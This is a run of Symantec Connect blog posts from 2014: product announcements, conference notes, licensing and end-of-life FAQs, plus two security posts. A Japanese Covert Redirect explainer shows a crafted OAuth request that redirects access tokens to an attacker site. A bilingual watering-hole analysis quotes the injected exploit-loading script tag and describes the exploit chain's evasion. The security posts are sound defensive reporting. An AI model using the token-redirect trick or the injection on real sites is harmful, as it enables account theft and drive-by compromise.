Electricity costs have risen 4.2% per year for the past decade according to the Department of Labor.

Leverage your Symantec Management Platform, make Patch and Anti-Virus 100% more effective, and Reduce the Cost of doing business by implementing eiPower Saver Solution for SMP 7.1 and 7.5.

And to make a good deal even better, get up to 30% off your SMP 7.5 migration when you purchase eiPower.  Please visit the Intuitive or ITS booth for details, or contact Joe D'Agostino at joed@entisp.com.

ENTISP.COM

Hi all

As some of you may be aware Enterprise Vault 11 shipped on the 5th May. The official announcement is available here: http://www.symantec.com/connect/blogs/enterprise-vault-11-now-available

The product media download is available on FileConnect: https://fileconnect.symantec.com

I’m pleased to announce the following collateral related to the launch:

General

Enterprise Vault 11 Product Documentation: http://www.symantec.com/docs/DOC6634

Enterprise Vault IMAP Access Launch page: http://www.symantec.com/docs/DOC6624

Benefits of upgrading to Enterprise Vault 11: http://www.symantec.com/docs/DOC7164

Enterprise Vault 11 Compatibility Guide: http://www.symantec.com/docs/TECH38537

Enterprise Vault 11 Performance Guide: http://www.symantec.com/docs/TECH125795

Whitepapers

PST Migrations with Enterprise Vault 11: http://www.symantec.com/docs/DOC6625

Deploying IMAP Access with Enterprise Vault 11: http://www.symantec.com/docs/DOC7122

SQL Best Practice Guide for Enterprise Vault 11: http://www.symantec.com/docs/DOC6863

Feature briefings

Enterprise Vault 11: Storage Safety Copies: http://www.symantec.com/docs/DOC7386

Enterprise Vault 11: Enterprise Vault IMAP Access: http://www.symantec.com/docs/DOC7387

Enterprise Vault 11: Enterprise Vault Search: http://www.symantec.com/docs/DOC7388

Enterprise Vault 11: Enterprise Vault PST Migration Enhancements: http://www.symantec.com/docs/DOC7389

Enterprise Vault 11: Enterprise Vault SCOM Enhancements: http://www.symantec.com/docs/DOC7390

Kind Regards

Dan

Symantec would like to announce the release of App Center version 4.4. The Symantec App Center 4.4 release allows IT to confidently embrace Android in the enterprise and improves security for email and app access. This release delivers integrated threat protection for Android and support for Android 4.4 operating system. It also includes Secure Email and App Proxies for control of network access policies and compliance. These new features and others are available now in your App Center console to upgrade.

Summary of New Features

1. Confidently embrace Android in the enterprise
2. Improved email and app security
3. Improved usability in admin console

Feature Highlights

1.  Confidently embrace Android in the enterprise

• Integrated mobile threat protection
  • Protects Android users from privacy risks, mobile malware, greyware, fraudulent websites and more
  • Leverages Norton Mobile Insight, a dynamic intelligence system that analyzes every app in more than 200 app stores
  • Offers single-console management of threat protection, apps and devices
• Android 4.4 Support
  • Delivers device management and app protection for the latest Android OS

2.  Improved email and app security

• Secure app proxy
  • Improves employee productivity by safely extending enterprise resources to mobile apps and Symantec Secure Browser app
  • Secures app data in transit with per-app SSL, FIPS 140-2 tunnel
  • Eliminates need for firewall changes or complete device VPN
  • Separates corporate data traffic from personal data traffic
• Secure email proxy
  • Eliminates need for firewall holes
  • Enforces access control policies for users, devices and apps
  • Verifies device compliance before devices are allowed to connect
  • Provides end-to-end email security when used with Symantec Secure Email app

3.  Enhanced Usability

• Provides a snapshot of users registered, apps released, types of devices, and alerts:

Additional Features for Symantec App Center

• App Center now supports using iOS B2B Volume Purchase Program – Managed Distribution (VPP)  apps either as Symantec Sealed apps or B2B pointer apps.
• Added App Center API support, including REST based API and user and group creation API.

Technical Support

We value your business and are committed to customer care.  Please contact us if we can assist or answer any questions: www.symantec.com/business/support/. You can also visit the Symantec App Center Knowledge Base.

Don’t forget to follow us on Twitter: @SYMCmobility

Learn about the tools and resources available in upgrading to NetBackup 7.6

Keynote Preview

On day one, Symantec’s top experts will join forces with a special surprise guest to put some unexpected new twists on what it means to enable agile data centers, support evolving endpoints and embrace proactive cyber security. The Vision 2014 opening keynote starts at 9:00 a.m., so make sure you head over to the Colosseum right after breakfast. If you’re seated by 8:45 a.m., you might even win a great prize at our Early Bird drawing.

Get Your Carnival On

Play like a kid—and eat, drink and win like a grown-up! Tonight, we ramp up the energy with an upscale carnival-style party that includes plenty of food and drink—along with some festive games and entertainment. As you settle in, electronic caricature artists will be standing by to capture your best features, and the first 1,000 people to visit with Sponsors in the Expo Hall will receive a High Roller pass, good from 8:30 pm – 1:30 am on Tuesday. This is a complimentary ticket to the hottest new attraction in Vegas—the largest observation wheel in the world. Even better, it’s conveniently located across the street from Caesars Palace in The Linq. 

Win A VIP Trip to an Exotic Destination!

Are you ready for a world-class VIP vacation? Earn your chance to win by visiting our Virtual Passport Sponsors or collecting Vision mobile app points. When you have enough scans or points, stop by the InfoCentral counter in the Expo Hall to receive a cool t-shirt, participate in daily contest drawings, and become eligible for the big Vision New Horizons grand prize giveaway, which will take place during Thursday’s closing keynote. 

Vision Goes Green

Support our efforts to reduce, reuse and recycle throughout the Vision Conference! Make sure to use the refillable water bottle in your bag, compliments of SlashDot Media. Then throughout the rest of the week, take the time to donate any unwanted conference materials—including used paper, notebooks, pens, badge holders and backpacks—to the Teacher EXCHANGE organization. All of your donated materials will be repurposed and put to good use in local schools. When you’re ready to donate, look for the yellow school bus collection box by the Conference Services desk. 

Heartbleed 脆弱性をめぐる騒動が一段落したかと思う間もなく、今度は「Covert Redirect（隠しリダイレクト）」と呼ばれるセキュリティ上の欠陥が見つかり、その報告がメディアを賑わしています。なかには「第二の Heartbleed」と称している報道もあるほどですが、Covert Redirect が実際に Heartbleed ほど深刻かというと、そんなことはありません。

「第二の Heartbleed」という言い方は正しいか

いいえ。これは、サービスプロバイダによる OAuth の実装で発見されたセキュリティ上の欠陥です。

Covert Redirect が Heartbleed ほど深刻でないのはなぜか

Heartbleed は OpenSSL に存在する深刻な脆弱性です。OpenSSL は暗号プロトコル SSL と TLS のオープンソース実装であり、50 万以上もの Web サイトで使われています。Heartbleed 脆弱性は、パッチ未適用のサーバーに要求を送信するだけで悪用できてしまいますが、Covert Redirect の場合、攻撃者は影響を受けやすいアプリケーションを見つけたうえで、ユーザーからの応答と許可を得る必要があります。

Covert Redirect とは

Covert Redirect はセキュリティ上の欠陥であり、脆弱性ではありません。狙われるのは、オープンリダイレクトの影響を受けやすいサードパーティ製クライアントです。

たとえば、攻撃者は影響を受けやすいサイトのアプリケーションを使って、密かにサービスプロバイダの API に要求を送信し、redirect_uri パラメータを改ざんすることができます。改ざんされた悪質な redirect_uri パラメータは、認証に成功するとユーザーを悪質なサイトにリダイレクトします。

標準的な要求: [プロバイダ]/dialog/oauth?redirect_uri=[影響を受けやすいサイト]&scope=email&client_id=123&response_type=token

悪質な要求: [プロバイダ]/dialog/oauth?redirect_uri=[影響を受けやすいサイト]/redirectKeepParams?w=1dpoa&url=[攻撃者のサイト]&scope=email&client_id=123&response_type=token

悪質な要求では、承認されたアプリケーションではなく、攻撃者がユーザーのアクセストークンを受信します。

OAuth とは

OAuth は、Web、モバイル、デスクトップの各アプリケーションから安全な認可を取得できるオープンプロトコルです。［Facebook でログイン］ボタンなどで OAuth を使うと、OAuth が認可メカニズムとして機能し、サードパーティ製アプリケーションでユーザーアカウントへのアクセス権を取得できるようになります。

ユーザーにとってどのようなリスクがあるか

この欠陥を悪用するには、ユーザーからの応答が必要です。アクセストークンを侵害するには、影響を受けやすいアプリケーションに対する許可をユーザーから付与される必要があります。許可が付与されてようやく、攻撃者はユーザーアカウントデータを取得して、さらに悪質な目的に利用できるようになります。

アプリケーション開発者にはどのような影響があるか

Web サイトでオープンリダイレクトが使われている場合、攻撃者はそのアプリケーションを Covert Redirect の標的とする可能性があるので、Web サイトでオープンリダイレクトを停止する必要があります。サービスプロバイダ各社も、アプリケーション開発者が OAuth リダイレクト URL のホワイトリストを作成することを推奨しています。

次の手順は

Covert Redirect は注意すべきセキュリティ上の欠陥ですが、Heartbleed と同レベルというわけではありません。アクセスを許可するアプリケーションは慎重に判断すべきであり、Covert Redirect はそのことを再認識する格好のきっかけとなりました。

パッチの公開は期待できません。それぞれの実装を保護して Covert Redirect の欠陥に効果的に対処するかどうかはサービスプロバイダ次第です。

* 日本語版セキュリティレスポンスブログの RSS フィードを購読するには、http://www.symantec.com/connect/ja/item-feeds/blog/2261/feed/all/jaにアクセスしてください。

Symantec Vision day 3 begins with another great keynote in the morning and a sidesplitting performance and party at night. And of course, you can also look forward to another productive day of sessions, labs, and activities in between. 

Keynote Preview

Yesterday’s keynote focused on what it means to enable agile data centers, support evolving endpoints, and embrace proactive cyber security. Today, the discussion expands with two in-depth roundtables, featuring panels of Symantec thought leaders, customers and partners.

Embrace Your Inner Traveler at the Pre-Party Reception

Don’t miss this chance to take a trip around the world without leaving the Expo Hall—with a virtual tour of the tastes, sights and sounds of our upcoming Vision Symposiums in Japan, China, Dubai, Germany, France and South America. Make sure you take time to tweet or text photos of your favorite station, sample the selections of fine beer and wine, try a “Vision cocktail,” and prepare to rock out at the OneRepublic concert. Also, don’t miss out on the special prize drawing, where you could win a backstage pass to meet OneRepublic right before the concert! 

One Great Performance at the Wednesday Vision Party, Co-sponsored by HP

After the pre-party dinner reception in the Expo Hall, stroll over to the Colosseum for one amazing concert featuring OneRepublic, with multi-talented comedian Tommy Davidson as the opening act. Enjoy desserts and drinks before the concert starts and don’t forget that your Vision badge or guest pass is your only ticket into this exclusive event for Vision attendees and guests. If you qualify for VIP passes or floor access, you will need to show your VIP pass and/or wristband in addition to your conference badge. Attendees without a badge or ticket will not be granted entry to the concert, no exceptions. 

Win a VIP trip to an exotic locale!

FIND OUT MORE ABOUT THE VISION NEW HORIZONS PROMOTION

We’re Listening at the Customer Video Booth

STOP BY TO RECORD A 30 SECOND STORY ABOUT YOUR SYMANTEC EXPERIENCE

It might come as a bit of a shock to some people to see a title 'End of life for Enterprise Vault 10', but it seems it is mostly standard practice now that when Symantec release a new version of the product, they announce when the end of life will be for the previous version.

Don't worry though you won't need to rush out tomorrow and upgrade, there is plenty of time.

Take a look at the article from Symantec.

Symantec pcAnywhere™ End-of-Life

Customer FAQ

What is happening?

Symantec is announcing the end-of-life (EOL) for the pcAnywhere™ product on May 5, 2014. There will be no replacement offering. The pcAnywhere™ Solution product which is included with the Symantec™ Client Management Suite product and the Symantec™ IT Management Suite product, is not affected by this announcement.

Why is Symantec EOLing pcAnywhere™?

The pcAnywhere™ product has had no major releases for over seven years, which automatically initiates the Symantec EOL process. After careful evaluation, Symantec has chosen not to continue offering a stand-alone remote control product.

Will the pcAnywhere™ product have Windows 8 and Windows Server 2012 support before the End-of-Support Life (EOSL)?

No. Platform support will remain as is through the EOSL.

Will Symantec introduce another remote control product in the place of the pcAnywhere™ product?

At this time, Symantec has no plans to introduce a replacement remote control product.

Is the pcAnywhere™ Solution product affected by this announcement?

The pcAnywhere™ Solution product is included with the Symantec™ IT Management Suite product and the Symantec™ Client Management Suite product and is not affected by this announcement.

Is the pcAnywhere™ Solution product a good replacement option for pcAnywhere™ customers?

The pcAnywhere™ Solution product may be a viable replacement for customers with 500 or more computers who also need the Symantec™ IT Management Suite product or the Symantec™ Client Management Suite product. The pcAnywhere™ Solution product is only available in these Suites.

How does this announcement affect existing license purchases?

This EOL announcement does not impact your use of existing licenses for the pcAnywhere™ product. You may continue to use the pcAnywhere™ product in accordance with the terms of applicable license agreements and other agreements with Symantec.

How does this announcement affect support for the pcAnywhere™ product and current support agreements?

Symantec will provide support for the pcAnywhere™ product under current support agreements in accordance with the End of Life Policy for Symantec Business Products and the EOL timeline described below. Note that all support will end on the End of Support Life Date of November 3, 2015.

EOL timeline

• End of Life                           5/5/2014
• End of Availability            11/3/2014
• End of Support Life         11/3/2015

Who should I contact with questions?

For any questions, please contact your Symantec Account Manager or call customer care at 800.721.3934 in the United States and Canada. For specific country offices and contact numbers, please visit www.symantec.com.

Back in March, Symantec blogged about a possible watering hole campaign exploiting a zero-day vulnerability for Internet Explorer 8, the Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-0324). We continued our investigation into this attack, which we dubbed Operation Backdoor Cut, and have concluded that the focus of the attack was to target users associated with the Japanese basketball community. We drew this conclusion from our extended observation of the watering hole campaign abusing the vulnerability being solely hosted on the landing page of the official Japan Basketball Association (JBA) website. No other attacks on any other websites have been confirmed from our telemetry since the disclosure of the zero-day attack in March.

Figure 1. JBA landing page

The JBA website was originally compromised in mid-February to host a malicious script in the site’s HTML code that loaded exploit code from an external site in the background. The site appeared to be cleaned up afterwards; however, it was compromised again in late February to host a similar script. Then, yet again, malicious script was inserted just hours after the release of the patch for CVE-2014-0324 on Microsoft Patch Tuesday back on March 11. In all three occasions, a short script was inserted in the JBA site in order to redirect traffic to another compromised website hosting the exploit code located in Seoul, South Korea. The following is an example of the script used in the attacks:

<script type="text/javascript" src="https://www.[REMOVED].kr/uc/inc_jba.php"></script>

The compromised website, associated with a major Korean Café chain, hosted the actual exploit code. In each of the three compromises, the files were stored in different directories on the site. This particular site was most likely chosen to host the main part of the attack due to it being a reputable business which would not be likely to draw suspicion from security products or services monitoring the organization’s network. The following is a list of the files contained in each directory:

• inc_jba.php
• inc_front_us-en.php
• inc_front_ja-jp.php
• inc_front-2007.php
• inc_front-2010.php
• inc-module.jpg

The short script inserted into the JBA website led to the file inc_jba.php. This file contains JavaScript that checks the targeted user’s computer environment things such as the operating system (OS) version, which Microsoft Office version is installed, and the language of the OS. The JavaScript also checks if the browser has ever visited the page before by using a cookie as a check. If the page has been visited before, the browser is not directed to the exploit code as a precaution in case the user is a security researcher. If the environment meets the specified conditions, the browser is redirected to one of four exploit pages. Each of the four variations of the exploit code has been prepared for different environments:

• Windows XP – English (EN)
• Windows XP - Japanese
• Windows 7 with Office 2007 on a x86 computer
• Windows 7 with Office 2010 on a x86 computer

If the exploit code is executed successfully, it downloads inc_module.jpg from the same directory and renders the file to acquire the URL of the ultimate payload. Although the file extension is .jpg, it is not an image file, but is actually a data file containing encrypted information about the location of the payload. The browser then redirects to another server located in Seoul, which we believe was prepared by the attacker using the SSL protocol to encrypt network traffic. The following is the URL of the Seoul-based server:

https://login[dot]imicrosoft[dot]org/feed

Interestingly, this site was maintained on a virtual private server (VPS) rented from a company located in Beijing that appears to specialize in providing VPS located in the Unites States and South Korea. It may be safe to assume that the provider was chosen because of the geo-location of the server. The geo-IP location of the server hosting the payload must have been vital to the campaign’s success.

Figure 2. Login screen of the VPS site

The attackers had either a strategy to close shop quickly to make their campaign short lived or some sophisticated evasion technique was implemented to prevent security researchers from downloading the payload. Either way, we were unable to acquire the payload from this server.

From our observations, we believe the motive of Operation Backdoor Cut was to solely draw traffic from the JBA watering hole site as no other websites appear to have been affected. The name of the malicious script file (inc_jba.php) and the name of the cookie (JBA20140312v2) used to count the number of accesses to the page, both disguise themselves to appear as part of the JBA page. Traffic from the JBA website accounted for all detections observed by Symantec for this exploit.

Targeting the Basketball Community
Some may wonder why the Japanese basketball community is being targeted. The sporting community has important ties with both the nation and its government and basketball is no different. The Japanese basketball community has a rather interesting connection with the Japanese government. The president of the JBA is the current Deputy Prime Minister and Minister of Finance in Japan. He also happens to be the former prime minister. A link such as this may perhaps be the motive for the watering hole attack on the JBA site. The website may have been considered a good entry point or gateway to the Japanese government.

The Olympics may be another motive. As a major sports organization, the JBA has close ties with the Tokyo Organizing Committee of the Olympic and Paralympic Games which is the organizing body of the Tokyo 2020 Olympics. It’s no secret that Olympic organizations are often targets of cyberespionage. For instance, data retrieved from an investigation in 2011 into an operation named Shady RAT revealed that several Olympic organizations were attacked and computers on their network were compromised; the Japan Olympic Committee (JOC) happened to be one of the victims. Last year, Japan won the bid for Tokyo to host the Olympic Games in 2020 and is now preparing for the event. The nation is well aware of the potential for cyberattacks when it comes to the prestigious event. The Japanese government, in fact, held a cybersecurity drill in March in preparation for the Olympics to be held six years from now. However, the attacks may have already begun and may have started long before this exercise was launched.

Sectors including government, manufacturing, and finance may be common targets; however, any industry could potentially be at risk of a targeted attack. It is important to realize this and protect networks accordingly. Organizations should be prepared and draw up plans in case attackers happen to intrude the network.

Symantec has the following protection in place to protect against the Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-0324):

AV

• Bloodhound.Exploit.541

IPS

• Web Attack: Internet Explorer CVE-2014-0324
• Web Attack:  Internet Explorer CVE-2014-0324 2
• Web Attack: Generic Memory Heap Spray 4

今年 3 月、シマンテックは Internet Explorer 8 のゼロデイ脆弱性、「Microsoft Internet Explorer のメモリ破損の脆弱性（CVE-2014-0324）」を悪用した水飲み場型攻撃の可能性についてブログでお伝えしました。シマンテックはこの攻撃について調査を続け、この攻撃の目的が日本のバスケットボール界に関係のあるユーザーを狙うことにあったと結論付け、これを「Operation Backdoor Cut（オペレーションバックドアカット）」と命名しました。こうした結論を導き出すことができたのは、長期にわたり観測した結果、この脆弱性を悪用した水飲み場型攻撃が、日本バスケットボール協会（JBA）の公式サイトのランディングページだけをホストとして利用していることが判明したためです。3 月にこのゼロデイ脆弱性が確認されて以降、シマンテックの遠隔測定では、これ以外の Web サイト上で攻撃は確認されていません。

図 1. JBA のランディングページ

JBA の Web サイトが最初に侵害されたのは 2 月中旬のことです。サイトの HTML コードに悪質なスクリプトがインジェクトされ、このスクリプトによってバックグラウンドで外部サイトから悪用コードがロードされていました。その後、このサイトは正常化されたように見えましたが、2 月下旬には再び侵害され、同様のスクリプトがインジェクトされました。そして、3 月 11 日にマイクロソフト月例パッチとして CVE-2014-0324 に対するパッチがリリースされてからわずか数時間後に、三たび悪質なスクリプトがインジェクトされます。この 3 回とも、JBA サイトにインジェクトされたのは、悪用コードをホストしている、さらに別の侵害された Web サイトにトラフィックをリダイレクトするための短いスクリプトです。この Web サイトの所在地は韓国のソウルです。この攻撃で使われているスクリプトの例を次に示します。

<script type="text/javascript" src="https://www.[削除済み].kr/uc/inc_jba.php"></script>

侵害されて実際に悪用コードをホストしていたのは、韓国の大手カフェチェーンに関連する Web サイトです。3 回の侵入のたびに、このサイトの別々のディレクトリにファイルが保存されていました。このサイトが、攻撃のメイン部分のホストとして選ばれたのは、著名な企業のサイトであり、企業のネットワークを監視しているセキュリティ製品やサービスから嫌疑をかけられる可能性が低いためでしょう。各ディレクトリに含まれるファイルは、以下のとおりです。

• inc_jba.php
• inc_front_us-en.php
• inc_front_ja-jp.php
• inc_front-2007.php
• inc_front-2010.php
• inc-module.jpg

JBA の Web サイトにインジェクトされた短いスクリプトによって、inc_jba.php ファイルに誘導されます。このファイルには、標的となったユーザーのコンピュータ環境（オペレーティングシステム（OS）のバージョン、OS の言語、インストールされている Microsoft Office のバージョンなど）の情報をチェックする JavaScript が含まれています。この JavaScript は、cookie をチェックとして使う前に、ブラウザがこのページにアクセスしたことがあるかどうかも確認します。過去にアクセスしたことがある場合、ブラウザは悪用コードに誘導されません。これは、ユーザーがセキュリティ研究者である場合を警戒した対策です。コンピュータ環境が、指定された条件を満たしている場合、ブラウザは 4 つの悪用ページのいずれかにリダイレクトされます。悪用コードは、環境に応じて次の 4 つの亜種が用意されています。

• Windows XP - 英語（EN）
• Windows XP - 日本語
• x86 コンピュータの Windows 7 に Office 2007 がインストール
• x86 コンピュータの Windows 7 に Office 2010 がインストール

実行に成功すると、悪用コードは同じディレクトリから inc_module.jpg をダウンロードして実行し、最終的なペイロードの URL を取得します。拡張子は .jpg ですが、これは画像ファイルではなく、実際にはペイロードの場所について暗号化された情報を含むデータファイルです。ブラウザは、ソウルにある別のサーバーにリダイレクトされますが、これは攻撃者が SSL プロトコルでネットワークトラフィックを暗号化して用意したものと考えられます。ソウルに置かれているサーバーの URL は以下のとおりです。

https://login[ドット]imicrosoft[ドット]org/feed

このサイトが、北京に拠点を置く企業によってレンタルされている仮想プライベートサーバー（VPS）上で管理されていた点は注目に値します。この企業は、米国と韓国にある VPS を提供することを業務にしているようです。このプロバイダが選ばれたのは、サーバーの位置情報によるものと思ってまず間違いないでしょう。ペイロードをホストしているサーバーの Geo-IP 位置情報が、攻撃の成否を左右したはずだからです。

図 2. VPS サイトのログイン画面

攻撃者は、早々に撤収して短期間で攻撃活動を終わらせる戦略を取ったか、あるいはセキュリティ研究者がペイロードをダウンロードできないようにする高度な侵入手法を編み出したか、いずれかだったと考えられます。いずれにしても、このサーバーからペイロードを取得することはできませんでした。

シマンテックが確認した限りでは、「Operation Backdoor Cut」の動機は JBA を水飲み場サイトとして利用して、そこからのトラフィックを誘導することだけだと思われます。なぜなら、他の Web サイトはまったく影響を受けていないからです。悪質なスクリプトファイルの名前（inc_jba.php）と、ページへのアクセスカウントに使われた cookie の名前（JBA20140312v2）は、どちらも JBA ページの一部であるかのように偽装されています。シマンテックがこの悪用について確認した検出結果はすべて、JBA の Web サイトからのトラフィックでした。

バスケットボール界が狙われた理由
なぜ日本のバスケットボール界が今回の標的になったのか不思議に思う方もいるでしょう。スポーツ界は国民とも政府とも深く結び付いており、バスケットボールもその例外ではありません。日本のバスケットボール界と日本政府との間には、いささか興味深い関係があります。JBA の会長は、日本の現副総理兼財務大臣です。しかも、元総理大臣でもあります。このような関係こそ、JBA サイトに水飲み場型攻撃が仕掛けられた動機かもしれません。つまり、JBA の Web サイトが、日本政府への格好の侵入口またはゲートウェイと見なされたのかもしれません。

オリンピックが動機という可能性もあります。主要なスポーツ団体のひとつである JBA は、2020 年東京オリンピックの統括機関である東京オリンピック・パラリンピック競技大会組織委員会と密接な関係があります。オリンピック関連組織が頻繁にサイバースパイ活動の標的になることは、よく知られています。たとえば 2011 年、「Operation Shady RAT」と命名された攻撃を調査したときのデータでも、いくつかのオリンピック関連組織が攻撃を受け、そのネットワークのコンピュータが侵入を受けたことが判明しています。日本オリンピック委員会（JOC）も、このとき被害を受けました。日本は昨年、2020 年のオリンピック開催地に選ばれ、現在その準備を進めています。オリンピック開催地という名誉と引き換えにサイバー攻撃が増える可能性については、日本でも十分に認識されています。実際、日本政府は今から 6 年後に開催されるオリンピック大会に備えて、サイバーセキュリティ演習を 3 月に実施したところです。しかし、攻撃はすでに始まっているかもしれず、この演習よりも前にとっくに始まっていた可能性すらあります。

政府機関、製造業、金融などの業種は標的になりやすいと言えますが、標的型攻撃を受けるリスクはどの業種でも変わりません。そのことを認識して、相応にネットワークを保護することが重要です。企業や組織は、準備を怠らず、万一ネットワークに攻撃者の侵入を許してしまった場合の対策を講じておく必要があります。

シマンテックは、「Microsoft Internet Explorer のメモリ破損の脆弱性（CVE-2014-0324）」から保護するために、以下の検出定義ファイルを提供しています。

ウイルス対策

• Bloodhound.Exploit.541

侵入防止システム

• Web Attack: Internet Explorer CVE-2014-0324
• Web Attack:  Internet Explorer CVE-2014-0324 2
• Web Attack: Generic Memory Heap Spray 4

* 日本語版セキュリティレスポンスブログの RSS フィードを購読するには、http://www.symantec.com/connect/ja/item-feeds/blog/2261/feed/all/jaにアクセスしてください。

Capitalize On The Market’s Rapid Adoption Of Mobile Devices

Drive increased revenue and become your customers’ trusted advisor by providing the integrated mobile management, protection, and security solutions they need to confidently deliver and manage applications to users anywhere, anytime.

More:

Increase Revenue byHelping Customers Realize the Promise of Virtualization

Help your customers’ take decisive steps in extending the benefits of virtualization to even their most business-critical applications and build desired private cloud services on existing infrastructure that are both secure and compliant.

Learn about the latest trends and best practices in selling virtualization solutions.

More:

Today I received an email from one of our channel partners and his question was: "I'm not 100% clear on what is included in V-Ray and how it's licensed. Let's say I have 3 VMware hosts running a total of 1 million virtual machines.  Each host has 2 Quad-Core CPUs.  I simply purchase a 6-socket license V-Ray, correct? Another one - are there any special application agents that V-Ray does not include?  And if that's true, do I simply purchase "Agent X" just like I would for Backup Exec?  The same goes for options - if I need an NDMP agent, I would purchase that add-on in the exact same way for standard Backup Exec?"

If you have also been wondering how the V-Ray Edition differs to standard Backup Exec or maybe you have been trying to find the answers to the same questions listed above, then this blog is for you. I am going to briefly describe the V-Ray Edition and how it’s licensed while covering the basics of standard Backup Exec in respect to the differences between the two offerings. My goal is to answer the questions outlined above and in doing so provide further insight into the Backup Exec V-Ray Edition.

Backup Exec V-Ray Edition

The Backup Exec V-Ray Edition is designed exclusively for virtual environments. Ultimately, with the Backup Exec V-Ray Edition you get all the software you need to completely protect your virtual environment at a very attractive price. Plus, the capabilities of the V-Ray Edition can easily be expanded to protect physical servers too!

The Backup Exec V-Ray Edition is licensed per socket and includes the following software components:

• Backup Exec Media Server (x1 license)
• Backup Exec Agent for VMware and Hyper-V (unlimited licenses)
• Agent for Applications and Databases (unlimited licenses)
  • Exchange
  • SQL
  • SharePoint
  • Active Directory
  • Oracle
  • Lotus Domino
  • Enterprise Vault
• Backup Exec Deduplication Option (x1 license)

The Agent for VMware and Hyper-V “switches on” the integration with VMware APIs for Data Protection (VADP) and Microsoft VSS, which enables fast, high performance snapshots of the virtual disks attached to VMs. The Agent for Applications and Databases enables granular recovery of Microsoft applications. You do not need to buy additional agents or options for application protection in a virtual environment since they are already included with the V-Ray Edition.

All other Backup Exec agents and options in the Backup Exec portfolio e.g. Enterprise Server Option can be added to your Backup Exec V-Ray purchase by purchasing them in the exact same way as standard Backup Exec.

To extend protection of the V-Ray Edition to physical servers, you simply purchase one Backup Exec Agent for Applications and Databases for each physical Application or Database server you wish to protect. In addition, the Backup Exec Media Server and Deduplication Option included in the V-Ray Edition can be used to protect your physical servers. You don’t have to re-license these for your physical environment. The only additional software you need to purchase to protect physical servers is the Agent for Applications and Databases as mentioned above. However, you may decide to extend the functionality of Backup Exec by adding on additional Backup Exec Agents and Options. For example -  Virtual Tape Library Unlimited Drive Option, Enterprise Server Option, Exchange Email Archiving Option etc.

If we quickly take a look back at the question: “I have 3 VMware hosts running a total of 1 million virtual machines.  Each host has 2 Quad-Core CPUs.  I simply purchase a 6-socket license V-Ray, correct?”. The answer is yes. There are 2 sockets per host and a total of 3 hosts. That means you would purchase 6 licenses of the Backup Exec V-Ray Edition. Since Backup Exec protects an unlimited number of guest machines per host, it doesn't make a difference if you have 1 or 100 virtual machines per host machine. Backup Exec will protect them all. There is also no limit on the number of hosts you can protect. You simply count the number of sockets in the environment you wish to protect and purchase the corresponding number of V-Ray licenses. So with the V-Ray edition, you really can protect everything in your environment with a per socket licensing method.

If you wanted to buy standard Backup Exec to protect your virtual environment and what I mean by standard is purchasing Backup Exec via the a la carte licensing model, you would simply purchase:

• One Backup Exec Media Server license for each media server
• One VMware and Hyper-V agent per host machine
• Plus, one agent for applications and databases for every application in the virtual host for granular recovery capabilities

All other Backup Exec Agents and Options such as the Deduplication Option can be purchased in the usual way.

The recovery options available with the V-Ray or standard edition include:

• Protection for All Physical Servers
  • Full system recovery
  • Application and database recovery
  • File and folder recovery
• Protection for All Virtual Machines
  • Full VM recovery
  • VMDK recovery
  • Application and database recovery
  • File and folder recovery
• Application Data Granular Recovery in both virtual and physical environments
  • Exchange
  • SQL
  • Active directory
  • SharePoint

If you have any additional questions, you can reply to this blog, or find me on Twitter at @KateJLewis or @BackupExec

Thanks for reading.

Kate 

Elaboration on our idea presented in the Vision 2014 keynote

Updates deployed to the Connect production servers as a result of the code sprint that ended 13 May 2014.

User Facing: Desktop

• Added code to search results pages so each result displays the "posted on" date rather than the "updated on" date.
• Fixed a few issues with the Accreditation and Certification update scripts that were keeping new data from flowing into the profile pages of Connect users.
• Refactored the 'short summaries' blog code so it does not use the short summaries on blog overview pages.
• Updated the presentation template used for Vision presentations to use the updated 2014 version.
• Fixed a rendering issue with content submitted with the <code> tag.
• Added code that hides the public/private checkbox from users who are not members of any groups.
• Added code to notifications system for post-by-email users that does not print the username at the top of notifications if the username matches the contents of the First name and Last name profile fields.
• Fixed an issue users were having when viewing a Japanese post and were unable to switch to the English version of the target post.
• Added a "Reddit" share widget to posts.
• Fixed an issue with inconsistent RSS paths.

Admin Facing

• Added code to the Akamai cache clearing tool that will give admins more feedback when they submit target pages to be cleared from the Akamai caches.
• Added an "Upcoming Events" block to the right sidebar that is configured to display community-specific events on related community pages.

SEO Wins

• Added code that sets the proper RSS URL (by default) on filterable list pages. The old behavior was to not set an RSS URL until a filter was selected. This was causing SEO issues since web crawlers were unable to read the default RSS URL as they crawled the pages.
• Added contextual code that places a "rel=nofollow" attribute on hyperlinks posted by untrusted users (aka spammers).

According to a new US Census Bureau survey, the number of people who commute to work by bicycle increased about 60% over the past decade, however bicyclists still account for less than 1% of all commuters.

This increase in biking to work can be partly attributed to groups across the country that are working hard to promote and support biking in their local communities.

We are proud to partner each year with one such organization – the Silicon Valley Bike Coalition - as part of the organization’s annual Bike to Work Day event. This year Bike to Work Day was held on May 8th, and as with previous years, Symantec hosted an Energizer Station where riders stopped by for snacks, drinks, free give-aways, and to chat with fellow riders. We raffled off prizes for employees including bike safety lights, a tool kit with 16 multifunction bike tools, and other free bike related gifts.

This year we also set up a photo booth with fun props so riders could snap a memorable photo of their ride to work. Additionally, two weeks prior to the event we hosted a safety presentation to ensure employees, no matter what their experience riding, were prepared for the day.

Each year I look forward to this event, where we help the SVBC promote its mission to increase biking in Silicon Valley, while also encouraging our employees to choose a healthier and more environmentally friendly commute option. The SVBC is pivotal in supporting this cause in the Bay Area, and does so through a variety of programs such as setting up dedicated bike paths, encouraging the uptake of biking versus driving, educating both adults and children on safe biking practices, and advocating for government policies that support and protect bikers.

Missed Bike to Work Day? It’s Not Too Late

If you missed Bike to Work Day there is still plenty of time!

This year, Symantec has also joined the SVBC’s Company Bike Challenge (CBC), a fun and friendly cycling competition among companies throughout the Bay Area that encourages friends and colleagues to commute by bike during the month of May. Cyclists competing in the Team Bike Challenge will earn points for their team and company every time they ride their bike to work, the park, or any other destination.

If you haven’t joined Symantec’s Company Bike Challenge team, please do so. The more riders, the more points we get! To date, we have 27 members, and through the SVBC’s interactive online portal we are tracking the number of trips, GHG emissions saved, calories burned and miles cycled (see picture below). 

Make Every Day Bike to Work Day 

There are many reasons I choose to ride my bike to work (not every day, but as often as I can) – reducing my impact on the environment, increasing my daily exercise, and finding opportunities to commute with friends and family. But most importantly, I just enjoy it.

